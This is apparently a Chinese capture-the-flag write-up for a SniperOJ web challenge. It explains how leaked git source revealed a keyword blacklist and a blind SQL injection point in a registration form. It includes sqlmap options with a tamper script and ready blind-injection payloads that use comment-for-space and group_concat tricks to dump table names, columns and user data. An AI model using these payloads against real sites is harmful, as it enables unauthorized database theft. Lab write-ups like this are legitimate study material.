0x00 题目概况

题目地址:http://www.sniperoj.cn:10000/

这是一道注入题,存在git源码泄露,使用githack(freebuf有工具介绍)把源码脱下来,进行审计,然后注入。

挺简单的一道题,我自己卡一个地方卡了好久就是。

拖下来源码放在我服务器上,懒得拖想看看可以下载:

120.27.32.227/sniper.rar

大概分析如下:

敏感词过滤

$blacklist = array(" select "," union ","limit", " from ", "and","sleep");

foreach ($_POST as $key => $value) {

for ($i= 0;$i< count($blacklist); $i++){

if(strpos(strtolower($value), $blacklist[$i]) != false){

die("Come on inject me, you stupid srcipt kid!");

}

在注册页面:

// 判断用户是否存在

$sql_check = "SELECT userID from users where username = '$username'";

$result = $conn->query($sql_check);

if ($result->num_rows > 0) {

die("{\"status\":\"0\",\"msg\":\"用户名已存在\"}");

}

很明显的盲注点,在登录界面也有一个盲注点。(没发现哪里可以明注,本人新手还望赐教)

0x01 自己解题历程

1. 那个黑名单,“select”"union“” 可以使用内联注释绕过,或者使用其他如 /**/ 代替空格即可,and 可以用 && 代替,limit 没有找到方法绕过

2. 注入点  ,username 可以为:

' or 1 #

在 1 处进行盲注。

为真的关键词是 “用户名已存在”。

一看这么简单,加上最近深入了解了一下slqmap,所以想下直接用sqlmap跑就行。

sqlmap参数:  --string "用户名已存在" --suffix "#" --prefix " 'or " -v 3 --risk 3 --tamper space2comment.py

确实可以跑出来,但是,只能跑出数据库名,表名要靠碰撞,其他获取不到,很是困惑。

纠结了好一会,查看slqmap的payload才想起是 "limit" 在黑名单里面。

接下来就是怎么绕过limit限制的问题了。大体上思路有两种。

1. 不用limit ,寻找可以代替limit的关键字

2. 绕过限制,如编码绕过,内联注释绕过

找了挺久的资料,一无所获。没有找到mysql没有能代替limit的关键字,这里也绕过不了。

在网上看到一种这种绕过,在关键字中添加 注释   “/**/” ,如:sele/***/ct  。这是一种错误的方式,除非php会对  “/**/”进行过滤,否则,这种语句带入到数据库进行查询会报错的。

0x02 正确的思路:group_concat

大概自己思维还是太狭隘,一直在纠结怎么绕过limit ,想着盲注一定要有limit。

把源码挂在屏幕半天,偶然看自己的一下笔记才想起来使用 “group_concat”

个人对group_concat通俗理解:

进行查询,将多条查询结果以一行显示出来,即一条

如:select group_concat(username) from users

会将所有的username显示在一行

想到这,就没必要用limit 了。接下来就是写脚本的问题。

payload 如下:

获取表名:

' or ascii(substr(((select/**/group_concat(table_name)/**/from/**/information_schema.tables where table_schema=database()))from/**/1 for 1))=93 #

获取列名:

' or ascii(substr(((select/**/group_concat(column_name)/**/from/**/information_schema.columns where table_name=0x7573657273))from/**/2 for 1))=71 #

获取具体数据:

' or ascii(substr(((select/**/group_concat(username)/**/from/**/users))/**/from 2 for 1))=21 #

0x03 总结

git泄露

盲注不一定要使用 limit

记住 group_concat

使用sqlmap行不通时查看payload,别太依赖工具

题目挺简单的,自己太菜了,还要多学多看,这些远远不够

[SniperOJ](web)图书管理系统 注入 源码泄露的更多相关文章

  1. CTF中常见Web源码泄露总结

    目录00x1 .ng源码泄露 00x2  git源码泄露 00x3 .DS_Store文件泄漏 00x4 网站备份压缩文件 00x5 SVN导致文件泄露 00x6 WEB-INF/web.xml泄露  ...

  2. Web源码泄露总结

    Web源码泄露总结 背景 本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现. 源码泄漏分类 .hg源码泄漏 漏洞成因: hg init的时候会生成.hg e.g.http ...

  3. ctf/web源码泄露及利用办法

    和上一篇文章差不多,也算是对web源码泄露的一个总结,但是这篇文章更侧重于CTF 参考文章: https://blog.csdn.net/wy_97/article/details/78165051? ...

  4. 常见的Web源码泄露总结

    常见的Web源码泄露总结 源码泄露方式分类 .hg源码泄露 漏洞成因: hg init 的时候会生成 .hg 漏洞利用: 工具: dvcs-ripper .git源码泄露 漏洞成因: 在运行git i ...

  5. [WEB安全]源码泄露总结

    原文链接:https://blog.csdn.net/qq_36869808/article/details/88895109 源码泄露总结: svn源码泄露:https://blog.csdn.ne ...

  6. [web 安全] 源码泄露

    web 源码泄露 1..hg 源码泄露 http://www.example.com/.hg/ 2..git 源码泄露 http://www.example.com/.git/config 3..ds ...

  7. ctf常见源码泄露

    前言 在ctf中发现很多源码泄露的题,总结一下,对于网站的搭建要注意删除备份文件,和一些工具的使用如git,svn等等的规范使用,避免备份文件出现在公网 SVN源码泄露 原理 SVN(subversi ...

  8. XJar: Spring-Boot JAR 包加/解密工具,避免源码泄露以及反编译

    XJar: Spring-Boot JAR 包加/解密工具,避免源码泄露以及反编译 <?xml version="1.0" encoding="UTF-8" ...

  9. 放出一批学生管理系统jsp源码,部分有框架

    基于jsp+struts 2的学生管理系统eclipse - 源码码头   https://www.icodedock.com/article/25.html 基于jsp+mysql的JSP学生成绩管 ...

随机推荐

  1. netty系列之:不用怀疑,netty中的ByteBuf就是比JAVA中的好用

    目录 简介 ByteBuf和ByteBuffer的可扩展性 不同的使用方法 性能上的不同 总结 简介 netty作为一个优秀的的NIO框架,被广泛应用于各种服务器和框架中.同样是NIO,netty所依 ...

  2. Python语法进阶(1)- 进程与线程编程

    1.进程与多进程 1.1.什么是进程 进程就是程序执行的载体 什么叫多任务? 多任务就是操作系统可以同时运行多个任务.比如你一边在用浏览器学习,还一边在听音乐,,这就是多任务,至少同时有3个任务正在运 ...

  3. Solution -「NOI 2021」「洛谷 P7740」机器人游戏

    \(\mathcal{Description}\)   Link.   自己去读题面叭~ \(\mathcal{Solution}\)   首先,参悟[样例解释 #2].一种暴力的思路即为钦定集合 \ ...

  4. 我们一起来学Shell - shell的循环控制

    文章目录 Shell 循环之 for 语句 Shell 循环之 while 语句 Shell 循环之 until 语句 Shell 循环控制 break指令 continue 指令 exit 指令 s ...

  5. 操作系统实验一:进程管理(含成功运行C语言源代码)

    目录 操作系统实验一:进程管理 1.实验目的 2.实验内容 3.实验准备 3.1.1进程的含义 3.1.2进程的状态 3.1.3进程状态之间的转换 3.2 进程控制块PCB 3.2.1进程控制块的作用 ...

  6. 什么是闭包?(python)

    闭包,又称闭包函数或闭合函数,和嵌套函数类似.不同之处在于,闭包函数的外部函数返回的不是一个具体的值,而是一个函数.一般情况下,返回的函数会赋值给一个变量,便于反复调用. def outer(out) ...

  7. C#中default 、base 、this关键字用法简介

     C#中default关键字用法简介 default 关键字可在switch语句或泛型代码中使用.switch语句:指定默认标签.泛型代码:指定类型参数的默认值.对于引用类型为空,对于值类型为零swi ...

  8. linux目录跳转的好武器z.sh

    转至:https://blog.csdn.net/molaifeng/article/details/14123123 中午刷微博时看到一篇有关z.sh的介绍. 众所周知,在linux系统中进入目录都 ...

  9. Weisfeiler-Lehman(WL) 算法和WL Test

    Weisfeiler-Lehman 算法 很多论文中会讲,从另一个角度来讲,GCN模型可以看作图上非常有名的 Weisfeiler-Lehman 算法的一种变形.那么什么是 Weisfeiler-Le ...

  10. 探究Spring原理

    探究Spring原理 探究IoC原理 首先我们大致了解一下ApplicationContext的加载流程: 我们可以看到,整个过程极为复杂,一句话肯定是无法解释的,所以我们就从ApplicationC ...